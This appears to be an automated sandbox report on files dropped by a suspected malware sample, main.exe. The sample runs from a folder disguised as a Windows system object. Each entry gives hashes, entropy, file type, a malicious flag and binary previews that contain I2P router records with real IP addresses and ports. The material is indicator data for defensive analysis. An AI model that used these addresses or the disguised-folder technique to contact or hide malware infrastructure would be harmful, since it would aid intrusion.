Preview:.\.c..j.........g@5..../.."...vs+g...N..i.:..`T.u.s.Zg.g...+.a=.F..N...l.uh8.\Y...ma.....2.b..@...~. 5I../.e.p...|.CM./J(p9.....c$?*w>.Z.........d..e.....L6.d.....vL..>..4.....J.c.z.99.....G.Y..e..o}YGA....LwJ...K...|N.c[.t.....`\c..I..l't.B.D ..cU.@....&rI..)xq..~......|..>.....P=.n.,".n9...v...P%.^.*.Si..X.I...5.+$O......MR..G..6.gv....TL.n...+.Y...._.H..................9............NTCP2.@.caps=.6;.s=,d9VHkRFV1p8SdWjfKOaWLoq2KnRGxwaZtsTiiueYmBk=;.v=.2;..........NTCP2.w.host=.188.187.151.89;.i=.~W8umxSDJpWQo9-dH2wKVw==;.port=.26647;.s=,d9VHkRFV1p8SdWjfKOaWLoq2KnRGxwaZtsTiiueYmBk=;.v=.2;..........SSU2.|.caps=.B6;.i=,b4EkISX0M69JPgXHs6iUdjdiC9XB8kZq8LLZzV6HMx8=;.iexp0=.1722821286;.iexp1=.1722821286;.iexp2=.1722821286;.ih0=,C9QjuFiEWzEOYXzy0sE6eGVgzweoA4HAHxBkf3~erno=;.ih1=,sbnqEwhaxGnkVfKpdxscBzTfC7EDzMX5iky35IriM6M=;.ih2=,wliDyQAGUCHv0TvXxQSW9mUYykOMgDY1DOehYZIZ~Q8=;.itag0=.122192359;.itag1=.1474200835;.itag2=.3682003260;.s=,KRtFX6HV6-slRwn9CJHbWRFDOyEHfssPh68OqQ
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:data
Category:dropped
Size (bytes):987
Entropy (8bit):6.690592718699463
Encrypted:false
SSDEEP:12:H7R3udJJJJJJJJJ4kNqxBpoHJWE/euPsWWh5+59RERTeePXX9JoCqdlYJNoeJ:bFusjDoen9hQiTeePnynYJjJ
MD5:1FC6C0A1178040A148EC0DED854C0E80
SHA1:22489FA946964BCC2DC01683A62050D20C021BE2
SHA-256:E2E73BCC0CFD51345383C4128CD0C8AC962106C82ADE83788A72762DC922955F
SHA-512:26EB45A2EFB9CE96C342E9E0E15046C80FE9A32A9D23BEB734DE9106000077AC316F6E7F59644E9A26A480AB29EE192FA97CE3B2708FE82976BD74C8D47172F1
Malicious:false
Preview:.D..9.X.#%v1.4."7N'..I.2.....*..F.g.f.24..pas...6..1!....o....F.g.f.24..pas...6..1!....o....F.g.f.24..pas...6..1!....o....F.g.f.24..pas...6..1!....o....F.g.f.24..pas...6..1!....o....F.g.f.24..pas...6..1!....o....F.g.f.24..pas...6..1!....o....F.g.f.24..pas...6..1!....o....F.g.f.24..pas...6..1!....o....F.g.f.24..pas...6..1!....o..........#.7..'.......q.....P...............V...........NTCP2.@.caps=.4;.s=,X0r40rSuVuT8yEWexIVMngftEgoyG2oToSSxbCnjjk8=;.v=.2;..........SSU2.{.caps=.4;.i=,WjIvHUqt1q8AOrQWnAF6RbgIKMftcpn4QE65VOMmozs=;.iexp0=.1726476589;.iexp1=.1726476936;.iexp2=.1726477045;.ih0=,5UHTARL1Qf8gs0fm1jVToRmdJlNOmR05cK75E7HwKEI=;.ih1=,R0V5AytBq91nwRIAibRhPZvRAnY6ximlBTmLYgYr9CQ=;.ih2=,RO~8RMe7BAk8SsN0RN9IW52P2lVXanT~1wMyMFMvWU8=;.itag0=.2374885053;.itag1=.667188015;.itag2=.2448421539;.s=,fjLGGjBD~z44q6qpeNRLnAhmp5OcXa2x7skik2~Fnls=;.v=.2;..,.caps=.LU;.netId=.2;.router.version=.0.9.63;....*.x.._.K7..ftu.+...i.5.|@.Qgvxw.....7,]~1.u3... ....E...'..
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:data
Category:dropped
Size (bytes):1292
Entropy (8bit):6.67336120344388
Encrypted:false
SSDEEP:24:m1KKKKKKKKKjvbTeE/wvnaFjHzOQuUoe3uPMQSmRPnawmb:mivbd5zOQuA3sMRkiws
MD5:6A2CCE017AC9D21F790B1A9C54641781
SHA1:3425BADB0CCA2127E52F6033546A530562263282
SHA-256:1BBBC4913D1EB9EAD559964658C90C35F9E34EDDCD5C1CFECE796868E731EDAB
SHA-512:D18B9CFE6D77002A8742BD76381F60B997FF28B839BA44FCBB9D8C8A8ED719F3D3420AB4DE3E3DFC53AAB296C64D67D57BA734FEE21D5F649CBA0A21842B55D8
Malicious:false
Preview:Z.:%...."&..<.\.:^.....6p.eW.M5Q.=..Q-....).z.t..K..5-./..Y...Q.=..Q-....).z.t..K..5-./..Y...Q.=..Q-....).z.t..K..5-./..Y...Q.=..Q-....).z.t..K..5-./..Y...Q.=..Q-....).z.t..K..5-./..Y...Q.=..Q-....).z.t..K..5-./..Y...Q.=..Q-....).z.t..K..5-./..Y...Q.=..Q-....).z.t..K..5-./..Y...Q.=..Q-....).z.t..K..5-./..Y...Q.=..Q-....).z.t..K..5-./..Y....k...v...^$...oa.....\ze.T.ur..............p...........NTCP2.s.host=.68.1.55.11;.i=.NIYAsQ0xcj1vfKsbfDs5fQ==;.port=.26636;.s=,mDegBscLGXMOPcmzHGmgGDVTkR3qKW3SGc0~o70FtjY=;.v=.2;..........NTCP2.@.caps=.6;.s=,mDegBscLGXMOPcmzHGmgGDVTkR3qKW3SGc0~o70FtjY=;.v=.2;..........SSU2...caps=.BC;.host=.68.1.55.11;.i=,WmAc9WmKEZ4WUs-ct6Q6xuvqrdMkNqcGFJ-Emf-EvNA=;.port=.26636;.s=,tqMtzZhJC73JO15QuUavwuE~cPEquJqFIpxJjMP2HiQ=;.v=.2;..........SSU2...caps=.6;.i=,WmAc9WmKEZ4WUs-ct6Q6xuvqrdMkNqcGFJ-Emf-EvNA=;.iexp0=.1726474364;.iexp1=.1726474363;.iexp2=.1726474392;.ih0=,ZLSupHTpZRIxZ99ntg1SQEd-TFGMbsAe~~LK2Mq1F2U=;.ih1=,wRAqyBWGQTk2m0G4G8BcjJveW~6vID9FRg0Cck
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:data
Category:dropped
Size (bytes):1301
Entropy (8bit):6.708994151480675
Encrypted:false
SSDEEP:24:L7KYfAMKY0gGWxN2OGWP2CdVaafwepFwr0:L7H0uzoepl
MD5:78E83F5E473807EE81DBC80B214D2ED2
SHA1:AB49C43C0760D88991EDF616978E00E375949CF1
SHA-256:A9144E37A684D7733C756FD21E5153AE0569DA5117F9E1B31A04887ED2307BD3
SHA-512:B79B896E91DF009C7AE1584B09EF3395D166D9909E7A56AB740223CF76A928BACFA58C3017AADB342B5057B392131B89BA7A1FF288081D39E8BCF5E1A73050B5
Malicious:false
Preview:...^.........}...'.5.....n....k.%..^.tj.gK2...V....v.7.Y.*nM...%..^.tj.gK2...V....v.7.Y.*nM...%..^.tj.gK2...V....v.7.Y.*nM...%..^.tj.gK2...V....v.7.Y.*nM...%..^.tj.gK2...V....v.7.Y.*nM...%..^.tj.gK2...V....v.7.Y.*nM...%..^.tj.gK2...V....v.7.Y.*nM...%..^.tj.gK2...V....v.7.Y.*nM...%..^.tj.gK2...V....v.7.Y.*nM...%..^.tj.gK2...V....v.7.Y.*nM.. Hw.)Sy{J.~.pwb]....,7......1&..........................NTCP2.w.host=.139.162.110.14;.i=.uvbv4aj5GiqYOFobRgHeEA==;.port=.22293;.s=,Vg68iPl9pdbc4-SEDoQVZTCgfDm3QHvk9H7WLCNj0ng=;.v=.2;..........NTCP2...host=.2400:8902:e002:2300::1;.i=.uvbv4aj5GiqYOFobRgHeEA==;.port=.22293;.s=,Vg68iPl9pdbc4-SEDoQVZTCgfDm3QHvk9H7WLCNj0ng=;.v=.2;..........SSU2...caps=.BC;.host=.139.162.110.14;.i=,hFrZ40LtRmfUFkuvnh-tIuNIeVAUBtx1FPjsX4eG6lc=;.port=.22293;.s=,SSod72w94SzCZIHukx7g1DcepGz5skevJgsXRz0S4i4=;.v=.2;..........SSU2...caps=.BC;.host=.2400:8902:e002:2300::1;.i=,hFrZ40LtRmfUFkuvnh-tIuNIeVAUBtx1FPjsX4eG6lc=;.mtu=.1500;.port=.22293;.s=,SSod72w94SzCZIHukx7g1D
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:OpenPGP Public Key
Category:dropped
Size (bytes):988
Entropy (8bit):7.241959838492758
Encrypted:false
SSDEEP:24:OFTxAij8wDJBSiCTLvTy5mekoQuOCB2sp166uPQwDuR24NkHD0C:ah3YLImekoQtAp06GqIn
MD5:386005CBCDFAAA703F8E760A2D30EB92
SHA1:680D51C5A1A7375DBF587800DEA3CBE4AFE980AB
SHA-256:6F31A5816BA0780239A90180F40FC1D88793730AFBD0AAADA3B309D3255D8B93
SHA-512:2C2191B7583220E629F9AA0F78EEE00A0868E438032BC1F8B2623A29EC959A74D13C45EA4F0338047D84AA6B3688FD429CD521AC9B3F365370731D48D1009290
Malicious:false
Preview:.....M@[.....4...yA..:Xx#W.=.0..*............w(.:.x4........^Z.X..qnFV.x.wJ.zn.#...X. ....<.a....:..`Z$^.,..'zH.W..e.) N..uQ:...C.....Q=...`z.c.y...h.V`x.P..w2.".....V;.G.#}..F.....Qt.=.h.^d.t..]..s,b...m.|...X..v^..1....?......1[..&.(1?.j....._s.I.H.....Z.$....;...K?.w;....i....]....j....T,I.....A}...z4n..T..S.;t.L.%..NP.. ..U.2....rY:.i...3.h.[...............................NTCP2.@.caps=.4;.s=,Z2-4omkN8NwVw4Vf-tDhg~j5t-edFyoc1umdMlfF9yY=;.v=.2;..........SSU2.|.caps=.4;.i=,5QdUNUUTjVCOTUkCJPvJVZ9ebsAqr5vjSJvM8rinztA=;.iexp0=.1726480311;.iexp1=.1726480245;.iexp2=.1726480245;.ih0=,-e0SW5rDvxh2vRCfJNNAUGBy8gYaS-s8Sxze7uFHjkE=;.ih1=,aeem9xeOtL2aUPTcp8OBJZltJW6TeDsxvnBpyzNRDUs=;.ih2=,NOnV511ghllUPy7LOANQx27OJ3pssEWXusswtP4QSgM=;.itag0=.2298829326;.itag1=.3030499843;.itag2=.2591940804;.s=,F1uL04bVW0LeacJ85hIiy6clkxjQZCMI~BYQ5bAh8xY=;.v=.2;..,.caps=.LU;.netId=.2;.router.version=.0.9.56;.{.e.[.7@..._...:W...Jk!.3.1C...9O5.w...OO..)on..Z.&!.UK.R..
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:data
Category:dropped
Size (bytes):885
Entropy (8bit):6.667786076645771
Encrypted:false
SSDEEP:12:9zOOOOOOOOOW4K4VHcSXymDdgeAWNZKSEL6iuGDEY98JCKSEL7hAiuGDEYiEVWFA:56yyKDWzEGiHJEJAiHXMi
MD5:9D251229B6EB5BBA3F6FDEE13B3FA61D
SHA1:428F86E3BF6FF7659CC520FDC0AE2C0C920BF582
SHA-256:033631D36946E2632DCA081BA24301AFD0C96CC656CB868C8006C1F41478099E
SHA-512:44AF93371C83A86961339839ED77590E97B13E8503FBE8373A169BE5EDA065280EBD630CA6CE3A5BE86E3D8A5F6B7CB5EFA2A39339F82E9E5F1F18F516D9D2FB
Malicious:false
Preview:;!.9..A....]C..z......Z+S........G.6...B....w....SF..{..=.E.DeH..G.6...B....w....SF..{..=.E.DeH..G.6...B....w....SF..{..=.E.DeH..G.6...B....w....SF..{..=.E.DeH..G.6...B....w....SF..{..=.E.DeH..G.6...B....w....SF..{..=.E.DeH..G.6...B....w....SF..{..=.E.DeH..G.6...B....w....SF..{..=.E.DeH..G.6...B....w....SF..{..=.E.DeH..G.6...B....w....SF..{..=.E.DeH..N..9._...(.x..`.........[...............%...........NTCP2.A.caps=.46;.s=,yWFEXZhDFau~i1hJiKUpf-KijMpiEw2QwsXqn3xj0Ws=;.v=.2;..........SSU2...caps=.C;.host=.81.183.201.129;.i=,aNSKfwLnGE9G7dOS2gXsy1Li-CXEwcuQvXTGzIUqJEw=;.port=.9732;.s=,15kl1m7irUNT7TV24r5fk2jVRDTqS2lxgCxFZpe8bkw=;.v=.2;..........SSU2.q.caps=.6;.i=,aNSKfwLnGE9G7dOS2gXsy1Li-CXEwcuQvXTGzIUqJEw=;.s=,15kl1m7irUNT7TV24r5fk2jVRDTqS2lxgCxFZpe8bkw=;.v=.2;..,.caps=.XR;.netId=.2;.router.version=.0.9.62;.v...C.\?..r..}..i.C..S.S....o.. .t..K)&.......cp...Y..o...uR..
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:data
Category:dropped
Size (bytes):1147
Entropy (8bit):6.5974977076848775
Encrypted:false
SSDEEP:24:zjKtVKtVKtVKtVKtVKtVKtVKtVKtVKtqb3d3Smgv3dZ6rxBM6rxB1/XF:zsxbAviBMiB19
MD5:2E0FE5B6360D1936C9DC0558F866B68D
SHA1:E9E45994EFFD5269DB72F11CFC67A6629B2965CB
SHA-256:1E7D269A2E50A292BC8087402E96F0223C76CDFD3DBC1B2645EA6A4EEB2F2C63
SHA-512:DA86B8EDA2F9009C4159847ADA237287F0440ECD17E107766BBA3C6653804EF3E6005B270B0DDE9A6405796A9133EE9BBAAD204AEC86E2C1F0C1745D30E9F591
Malicious:false
Preview:.D2........W.Lj.QF..LNpq.?b.hw....o.T[..1|.......o5.@..e.~..a....o.T[..1|.......o5.@..e.~..a....o.T[..1|.......o5.@..e.~..a....o.T[..1|.......o5.@..e.~..a....o.T[..1|.......o5.@..e.~..a....o.T[..1|.......o5.@..e.~..a....o.T[..1|.......o5.@..e.~..a....o.T[..1|.......o5.@..e.~..a....o.T[..1|.......o5.@..e.~..a....o.T[..1|.......o5.@..e.~..a.Y0).C)..J...........7.y..YG2............$..V...........NTCP2...host=!2600:3c00:0:0:f03c:93ff:fe21:fcc7;.i=.zAuH3HhKHZs4pc2aAmKLJg==;.port=.23016;.s=,b6MSxMHwK~mWQukmtDGmR2p9jF0fmzid08ejQT96cgI=;.v=.2;..........NTCP2.u.host=.66.228.49.30;.i=.zAuH3HhKHZs4pc2aAmKLJg==;.port=.23016;.s=,b6MSxMHwK~mWQukmtDGmR2p9jF0fmzid08ejQT96cgI=;.v=.2;..........SSU2...caps=.BC;.host=!2600:3c00:0:0:f03c:93ff:fe21:fcc7;.i=,lno3X0edF1WvVashRbps6Tfvcu3HyW25Vn~n2BEOlig=;.port=.23016;.s=,mfB4XyWlN5A-B6STb6b4l3f5R~8fggVGVJTk~DNstBw=;.v=.2;..........SSU2...caps=.BC;.host=.66.228.49.30;.i=,lno3X0edF1WvVashRbps6Tfvcu3HyW25Vn~n2BEOlig=;.port=.23016;.s=,mfB4XyWlN5A-B6S
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:data
Category:dropped
Size (bytes):1211
Entropy (8bit):6.665753428190035
Encrypted:false
SSDEEP:24:HsfVvAAAAAAAAAC2zLA/56fPX3LA/56fHSsnP5lPXzSsnP50fcKO0:HstvAAAAAAAAACxsfPws/rfPjrSfc4
MD5:E832A94D27826CE4D04620E4B3309B88
SHA1:8D6FC56BC2D7EE3F578058CD783DAD59B74BC099
SHA-256:21ECDCB61FFE3D1B2F64CF7798967D1A37D6587A8F768CD98E5D08ED908EE664
SHA-512:EB8838650C2341ACA0F1E5F6D895A6C2152618FB9A4A060EAC21C92A5A4B611D84ED6F9C0E7616CA6917FC0D5C78663ACB1BAFD46EB96C64B63F40EBE37110D7
Malicious:false
Preview:.4....?...L........a....F[p-.m.a.#:.Uy.j......E...Y.Ev.w. .z..a.#:.Uy.j......E...Y.Ev.w. .z..a.#:.Uy.j......E...Y.Ev.w. .z..a.#:.Uy.j......E...Y.Ev.w. .z..a.#:.Uy.j......E...Y.Ev.w. .z..a.#:.Uy.j......E...Y.Ev.w. .z..a.#:.Uy.j......E...Y.Ev.w. .z..a.#:.Uy.j......E...Y.Ev.w. .z..a.#:.Uy.j......E...Y.Ev.w. .z..a.#:.Uy.j......E...Y.Ev.w. .z..j...+.-.<M./.../Q.KK$..].O..%..............(c...........SSU2...caps=.BC;.host=%2001:a62:1a13:901:2a13:4fbc:9aef:63e3;.i=,J3qQm2CJ56a8UqJ7hPo6z5UMcEuauLlCQgyHZqRzEyQ=;.port=.11724;.s=,VpOgaYdd5SGDuQzp47RjP74KaUcHk3docSvVe7-sZmA=;.v=.2;..........SSU2...caps=.B;.host=.188.174.130.9;.i=,J3qQm2CJ56a8UqJ7hPo6z5UMcEuauLlCQgyHZqRzEyQ=;.port=.11724;.s=,VpOgaYdd5SGDuQzp47RjP74KaUcHk3docSvVe7-sZmA=;.v=.2;..........NTCP2...host=%2001:a62:1a13:901:2a13:4fbc:9aef:63e3;.i=.-egS0hlkC112KK6gyTYgBw==;.port=.11724;.s=,~AmmMkczQtvVyBqzHuLjYis-WQhuK0v-LNAsrDj7tAQ=;.v=.2;..........NTCP2.v.host=.188.174.130.9;.i=.-egS0hlkC112KK6gyTYgBw==;.port=.11724;.s=,~AmmMk
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:PDP-11 overlaid pure executable not stripped
Category:dropped
Size (bytes):806
Entropy (8bit):6.663323014094592
Encrypted:false
SSDEEP:24:ckEc0MEMEMEMEMEMEMEMEMEM8zJPT2PYOJrIMRP:ckEc0JJJJJJJJJ3zd2hrRP
MD5:BF47A73FD7E5494275743144E0735AAF
SHA1:0A1D6A677A9C9F26C12F9C52F5ED93D7D010378B
SHA-256:FD259FB7E8043E1A4B1F849937F458D56AFB0198DDC7BE2E3B48E3D696ECA994
SHA-512:324D7864C221F08435501C670BE33F1661106E11DA08E7F844F6A075C56522088EA2BDD00963E1150AC67EE846EB0D3F1B9DEB99C7280A3FA57CD811E38DC496
Malicious:true
Preview:...(.....b.5`N..4.A.+.....U..^iq|..R..3+..j....Z.PD8.....c..iq|..R..3+..j....Z.PD8.....c..iq|..R..3+..j....Z.PD8.....c..iq|..R..3+..j....Z.PD8.....c..iq|..R..3+..j....Z.PD8.....c..iq|..R..3+..j....Z.PD8.....c..iq|..R..3+..j....Z.PD8.....c..iq|..R..3+..j....Z.PD8.....c..iq|..R..3+..j....Z.PD8.....c..iq|..R..3+..j....Z.PD8.....c.......|..,=.`...|0..O......v.........................NTCP2.t.host=.66.78.40.49;.i=.GTn1UdCBzrv97kCLXwvBnQ==;.port=.20105;.s=,r3v7RMN5uJTBwUyev07j1YckwXEYfcbf-rCEv6IY5Cg=;.v=.2;..........SSU2...caps=.BC;.host=.66.78.40.49;.i=,77rhEt7PKYrc9q7VcRCmeROnjm4ssaAewVxN9SRDr8k=;.port=.20105;.s=,wLLseBKaImd5M98ACR5uq3wO9fE8~aZOI7SkVATYwkI=;.v=.2;..,.caps=.LR;.netId=.2;.router.version=.0.9.62;...Y(k."%.;.&:...8P0{j..0..<[.i......-*..Q..6..:....Y..n...f=.
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:data
Category:dropped
Size (bytes):808
Entropy (8bit):6.702200965611099
Encrypted:false
SSDEEP:12:imO/wuwuwuwuwuwuwuwuwuwKQwnXwiHCJIcB4fZgsK0SywJp1iwE:iOLLLLLLLLLKRAiHC+Jf+R0gviwE
MD5:92D3042ED1C342AEFF16E798C504343D
SHA1:93A3E78DAE886268E85BF9DD02F67FBB9F66794F
SHA-256:CB1913A07DB3507E4AE740F6FF4A6940D47F218579A2DAD2F59B6ADF959CD842
SHA-512:290B683FE215F807C44F6F02594D5C0CC32645AE2AB0AF142936FE80418121CFFD02CCAA0D487EB04F08B57E28A511193FF36A4034133BA2D2728B4381631FB3
Malicious:false
Preview:O^b.I)....gV.......!..."V.....)-.....-....y.G.h...m(..g......\-.....-....y.G.h...m(..g......\-.....-....y.G.h...m(..g......\-.....-....y.G.h...m(..g......\-.....-....y.G.h...m(..g......\-.....-....y.G.h...m(..g......\-.....-....y.G.h...m(..g......\-.....-....y.G.h...m(..g......\-.....-....y.G.h...m(..g......\-.....-....y.G.h...m(..g......\.3.W...YY......".M.HDb.{..P...........................NTCP2.u.host=.2.135.133.55;.i=.Og2iVtxfAr-CsVBzZQDuSA==;.port=.12868;.s=,kqpXdXUf3U-2hTazdLn5~KkxTHFbgZnpTBNuqLlzPn0=;.v=.2;..........SSU2...caps=.BC;.host=.2.135.133.55;.i=,5X87B1MAnl9QBtuwcr8fNM5JhD1600VGtUtE~hMR58A=;.port=.12868;.s=,3nLYWh8FSy125DwQZOR9rKStSBSzt10u20x11dAWAkQ=;.v=.2;..,.caps=.OR;.netId=.2;.router.version=.0.9.63;........s..WTl.......K^..J...~..E..r,t..........n...;._tT..
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:OpenPGP Public Key
Category:dropped
Size (bytes):807
Entropy (8bit):6.806066744332605
Encrypted:false
SSDEEP:12:XSLPk2xI2xI2xI2xI2xI2xI2xI2xI2xI2mEY/fmRlruf358jTkZZT+WW58loAPDe:CDlfffffffffmh/vfSE+WjloA7/DTOJ
MD5:0645F7DBB35C9C7664E0BAE69427B0A3
SHA1:9D3051A08E8A4C08B2F6E0C55FC798EE29B6ADC4
SHA-256:A9469BBBC1200B714AA90C826283DAC33CC88575AE849D297EEE17C42012C101
SHA-512:BB1FDADF1FE5FC674BC60998CB08C0CAF62E1D1CABBB3640737EAD6965AF34BF31BE717E262C36D64854E1F4AA2AEFE59FBB7F5EA509469952B8BAB33740B610
Malicious:false
Preview:.^.4...YL......>..`[..[z{..w..+u..1..S......O..!m.....@._O...U...1..S......O..!m.....@._O...U...1..S......O..!m.....@._O...U...1..S......O..!m.....@._O...U...1..S......O..!m.....@._O...U...1..S......O..!m.....@._O...U...1..S......O..!m.....@._O...U...1..S......O..!m.....@._O...U...1..S......O..!m.....@._O...U...1..S......O..!m.....@._O...U...R..Vb.=o....H.(..*c..L...>P................_...........NTCP2.u.host=.190.22.24.78;.i=.CAIN~oMBhZ2IK4LXX6sTSg==;.port=.33037;.s=,LULdKdNGySVbJnylcZCA8C-jkVlDP0iwyLMtvKRHZnA=;.v=.2;..........SSU2...caps=.B;.host=.190.22.24.78;.i=,oZ1psWkb2jVLpAOZCOX6tP~9ZnfZ5e8PHMchZ9Lj09U=;.port=.33037;.s=,YVG8FG4ro6pc2jfPgJBXlpXl5OORBrIL57Bkc2E8cVY=;.v=.2;..,.caps=.NR;.netId=.2;.router.version=.0.9.63;..\N..".EF.x......m.x..Xr.~C...S......?...9*..gX............4..
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:COM executable for DOS
Category:dropped
Size (bytes):808
Entropy (8bit):6.600197451286896
Encrypted:false
SSDEEP:24:WzzdzdzdzdzdzdzdzdzdztHBooF9wWbbAAOykpP:WzZZZZZZZZZZBoGWMbApP
MD5:6172C16E38F5D1AE995D87567CA54634
SHA1:37968CF5892F5FDBC77A4FA0A57FB123106F2AFD
SHA-256:1ADD354677601E0EF2DF96BDBBD04E30236D7A6ED5F42964AD381D903153DFF1
SHA-512:64D1D7CA47964AB98B83BDBF11DF35A6FA280A1DFE0486CF0506AA3764938E3FFBEF9D9516114DF22A980AFDDA8F6C634DB17F604B8DE79C06FA9450FD2205DD
Malicious:true
Preview:.;.1..{p9Y.x$.....%u..,./<...di..M.M.ay7..p.*B.....g..LP.z....M.M.ay7..p.*B.....g..LP.z....M.M.ay7..p.*B.....g..LP.z....M.M.ay7..p.*B.....g..LP.z....M.M.ay7..p.*B.....g..LP.z....M.M.ay7..p.*B.....g..LP.z....M.M.ay7..p.*B.....g..LP.z....M.M.ay7..p.*B.....g..LP.z....M.M.ay7..p.*B.....g..LP.z....M.M.ay7..p.*B.....g..LP.z..c.h...K....9/.7=..I6l.p.n.X...............1...........NTCP2.u.host=.5.19.249.240;.i=.ZTajYRcLK4edCLzUqe53aA==;.port=.19209;.s=,8U4Ie0QTlH9OMDRdpoCe~6~mLwhZiQQuIn2XvNNdNQw=;.v=.2;..........SSU2...caps=.BC;.host=.5.19.249.240;.i=,oDORHO0npVzpYLrtU3lZvz5PHUYwiS-Vjs~pt4rU5D4=;.port=.19209;.s=,2kBVmOmtU4znCA~jz4iRapY8wg~hq1Li3bjedm-CfC4=;.v=.2;..,.caps=.PR;.netId=.2;.router.version=.0.9.58;........P.....F..p\.4?..YP7.U.....Ho..z.G\.~.......tmtQ.....
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:data
Category:dropped
Size (bytes):780
Entropy (8bit):7.35720864233346
Encrypted:false
SSDEEP:12:dVI/D1YVo9HClRg4kHbT2RtUEqPojukWm+e9D9EmC3BsNR5P6heWK7t6X1:XxVoVeiJeaEqPojsLoDqUf5PKao
MD5:FBA700CB3BA5D0839C42ED8A744C5F93
SHA1:6FFA19DBF2424C6ADC94365B0B277E99E3247BBF
SHA-256:603E743583AE2781C123476209E960DAD4820294E24CB5AAEBF21A53AE980259
SHA-512:60EF267B3E057057E088060B2157EAB96C6A04D82436F447662EFA594AEE9604B7C0BB5F516DD3DCAA8A161E6C3972FCF1F28ACD89C9918021CB848FAA7A941B
Malicious:false
Preview:Wf./.R...\R...mI..d.A...O.B.e.Dm..i.......y......6...N....C../.^V..>i.2.cm-.[..E..`.]=K..].UO_=..x..".n..zW4<.....;[.Y.}..D9K..%....R..E.J.[+..<y^i..."...+7eR..v...9..i..........W&...i,.E..L.X.....C.._.].1.L.7."..y....o.....'.?(..."JvM.k..O.'.LG......,..G.cS...B.L#.8....5..A....^...<.w..6.A6:.K..u.{....~.[V.3.`.Q5:.R.u..X4.....Z. ..y.Z..Yt...7...K....X.2...^.........................SSU._.caps=.BC;.host=.116.240.52.76;.key=,-u2RlpXk9D46CHwrOeXXYsV7I2SUNBJKVzarBeeKceI=;.port=.38481;..........NTCP2.v.host=.116.240.52.76;.i=.RWOCXnL6l5-f7VHj2G6leA==;.port=.38481;.s=,Q6uqRT3Ap-dZ~lzKVNcy6Th-w7qGw1Kw31ucPsUMlX8=;.v=.2;..........SSU...caps=.6;..,.caps=.LR;.netId=.2;.router.version=.0.9.51;hA..B<..Hc..#....Nj..F.nD>..{....B.D..L0C.q...a..gk.......6v.
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:data
Category:dropped
Size (bytes):813
Entropy (8bit):6.678025829966118
Encrypted:false
SSDEEP:24:4r/i/i/i/i/i/i/i/i/i/pfGRpcSxR1z/Aac:3fGzcS/4
MD5:5C517DBF9FE6D9B8E7823EAE97F8024C
SHA1:59F48F64E2F02DD002661AC8ADB6465FEB77C178
SHA-256:82C217F003D6595508A886F007D12B4475760DA7F5DADB721838317CF693C2E8
SHA-512:2FA73FED33A3B5A7AEA4BFB67B9879BAD9B323513275BC4D64826D5A2C68C36DB66460DB9FD89BADAEA75CD4298B6F2F0D031D03AAAF86564CAC3FAFB220E7FB
Malicious:false
Preview:30u.dg.;.L.{..nc-fy@......K.t[-@..].....n....d...E..(.r.....W.@..].....n....d...E..(.r.....W.@..].....n....d...E..(.r.....W.@..].....n....d...E..(.r.....W.@..].....n....d...E..(.r.....W.@..].....n....d...E..(.r.....W.@..].....n....d...E..(.r.....W.@..].....n....d...E..(.r.....W.@..].....n....d...E..(.r.....W.@..].....n....d...E..(.r.....W.C....lJ.g.6.R...P.]......Q...o...............P...........SSU2...caps=.B;.host=.213.145.125.139;.i=,vaaVnYyXy-bNKio-2eqv84QR8EWml2cMQRiKy4ERe7c=;.port=.21689;.s=,KR6fIOSXDIEDr4qDcF~7D01HoISsZfH9gk4t-pjHxyE=;.v=.2;..........NTCP2.x.host=.213.145.125.139;.i=.jPXGebAu40CGoQJXUj-C6A==;.port=.21689;.s=,GrBH7~vgI1CAp9QPrMbAhpbDliWYozJejQK~7-z-YRc=;.v=.2;..,.caps=.XR;.netId=.2;.router.version=.0.9.63;.'...\.....J..-6;u.8f.E..........2..0}.g}Z..o.......;o.).g..
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:data
Category:dropped
Size (bytes):1351
Entropy (8bit):6.609906999218422
Encrypted:false
SSDEEP:24:YnlmPmPmPmPmPmPmPmPmPrSExixmbE+pL4jEbEge7nrv/7ZOb2nhdL4jcsQe0hca:YnlmPmPmPmPmPmPmPmPmPr1V4jQY7rvJ
MD5:99578C2FF77B9A6817E1F45DE8E96BFB
SHA1:0EA12A979EDCDC49F74F9DEE15371A4EB2182340
SHA-256:937ECBC11C66E658071F1172B8CED9CC26A95A89A85345B122BA684BF8703E51
SHA-512:6D2A8940EC895E7FE5A84194DAEA5DB0C5FD78F5BA189F2C95C9F9CDB4929376FCBE775B4E7260A08E424DAF0240E341BE634B7F5D3A7450E1C0EA32883C394F
Malicious:false
